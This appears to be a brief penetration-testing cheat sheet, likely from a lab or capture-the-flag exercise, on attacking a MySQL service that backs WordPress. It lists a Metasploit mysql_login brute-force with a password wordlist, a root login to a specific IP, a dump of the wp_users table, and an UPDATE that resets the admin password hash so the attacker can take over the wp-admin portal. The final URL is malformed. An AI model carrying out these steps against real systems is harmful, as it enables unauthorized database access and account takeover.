- port : 3306
- auxiliary/scanner/mysql/mysql_login
- set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
- sample exploitation strategy after identifying sql password
- mysql -u root -p -h 10.0.25.212
- show databases;
- use wordpress;
- show tables;
- select * from wp_users;
- UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
- After changing WP-ADMIN password, login to the portal - http:///8585/wordpress/wp-admin